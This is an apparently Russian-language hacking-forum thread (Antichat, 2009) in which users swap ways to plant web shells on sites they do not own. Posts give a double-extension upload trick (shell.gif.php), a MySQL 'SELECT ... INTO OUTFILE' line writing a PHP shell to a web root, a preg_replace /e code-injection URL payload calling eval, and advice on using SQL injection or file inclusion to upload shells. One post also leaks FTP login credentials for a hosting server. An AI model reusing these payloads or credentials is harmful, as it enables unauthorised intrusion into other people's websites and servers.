09.05.2009, 23:05
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
Попробуй двойное расширение типа shell.gif.php
Не опытные программисты часто допускуют такую ошибку, так как проверяют расширение идущее после первой точки.
|
|
|
09.05.2009, 23:35
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
С праздником!
Такой вопрос:
есть phpmyadmin от юзера root@localhost со всеми привелегиями...при запросе типа
select '<? phpinfo(); ?>' into outfile '/patch_to_public_html/shell.php'
выдает "#1 - Can't create/write to file '.../shell.php' (Errcode: 13)"
В корень, в папки usr,var - та же ошибка... почему это у рута не хватает прав на создание файла Оо ?
|
|
|
|
09.05.2009, 23:43
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
так root то mysql ный а не системный!
|
|
|
|
09.05.2009, 23:48
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
bug1z, то, что ты нашел называется репозиторий. И это не уязвимость.
DeepXhadow, root в mysql не является рутом в системе. У тебя права скорее всего просто mysql. Ищи на сайте диры с правами на запись для всех.
|
|
|
|
10.05.2009, 00:01
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
Сообщение от oRb
bug1z, то, что ты нашел называется репозиторий. И это не уязвимость.
Уязвимосто-не уязвимость а некоторые свединия о системе выдаёт...
|
|
|
|
10.05.2009, 00:12
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
Посмотри на тестовый период дают phpmyadmin должен же быть и на платник нормальный phpmyadmin
FTP server: ftp://test3serv.mirohost.net
FTP login: test3serv316
FTP password: RqJt6A0p
Плфтный пхпмайадмин скорее всего даётся на определённый ip адрес, по крайней мерее так на большенстве хостингов.
Например так:
https://хх.ххх.хх.ххх:хххх
|
|
|
|
10.05.2009, 15:14
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Вообщем есть сплойт.
Код:
http://milw0rm.com/exploits/4851
Даже если забиваю этого кусок кода на локальхост
PHP код:
$source = htmlspecialchars($text);
$source = preg_replace(
'/<!--(.*?)-->/es',
'"<span style=\"color: ".$options["color"]["comment"].";\"><!--".
str_replace("<","<<!-- -->",
str_replace("=","=<!-- -->",
"$1")).
"--></span>"',
$source);
и тестю
Код:
html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo();
И собсна он не выполняет phpinfo...Вопрос почему?...в регурялках я не разбираюсь пока....в чём соль? версия php? |
|
|
|
10.05.2009, 01:00
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
2 bug1z
то есть , по другому никак ?
Я уже пробовал так (shell.jpg.php )
Возможно есть другой способ ?
PS: У кого есть html shell ?
|
|
|
|
10.05.2009, 12:22
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
Сообщение от Saiga
2 bug1z
то есть , по другому никак ?
Я уже пробовал так (shell.jpg.php )
Возможно есть другой способ ?
PS: У кого есть html shell ?
Почему же, есть и другие способы, например запихнуть шелл в картинку, об этом можешь почитать здесь(юзай поиск  )
Так же посмотри, нету ли в админке ф-и для добавления формата загружаемых файлов...
Если и эти способы не прокатят, зна не судьба залить через админку(ИМХО).
В этом случае ищи баг на сайте с помощю которого есть возможность залить шелл, это например SQL inj или php include, с их помощю можно будет залить шелл(ЕСЛИ ПОВЕЗЁТ!!!)
|
|
|
|
10.05.2009, 09:52
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 23
С нами:
9553576
Репутация:
-2
|
|
при воде ковычек выдает ошибку
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/index.asp, line 21
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
